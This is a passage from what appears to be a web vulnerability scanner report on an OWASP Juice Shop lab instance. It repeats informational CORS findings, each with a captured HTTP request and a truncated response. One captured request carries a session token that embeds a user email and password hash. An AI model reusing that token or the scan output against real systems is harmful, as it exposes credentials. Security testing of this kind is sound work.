    GET /public/images/products/%7B%7Bproduct.image%7D%7D HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:01:06 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.69. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-animate/angular-animate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-animate/angular-animate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:22 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.70. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-base64/angular-base64.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-base64/angular-base64.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:23 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.71. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:35 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.72. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:54 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.73. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-cookies/angular-cookies.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:56 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.74. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-qrcode/angular-qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:58 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.75. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-route/angular-route.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-route/angular-route.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:09 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.76. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-socket-io/socket.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-socket-io/socket.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:23 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.77. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-touch/angular-touch.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-touch/angular-touch.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:29 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.78. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:40 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.79. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-translate/angular-translate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-translate/angular-translate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:31 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.80. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular/angular.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular/angular.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:20 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.81. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:53 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.82. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:59 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.83. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/clipboard/dist/clipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:01 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.84. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:11 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.85. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/fontawesome/css/font-awesome.min.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/fontawesome/css/font-awesome.min.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:29 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.86. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
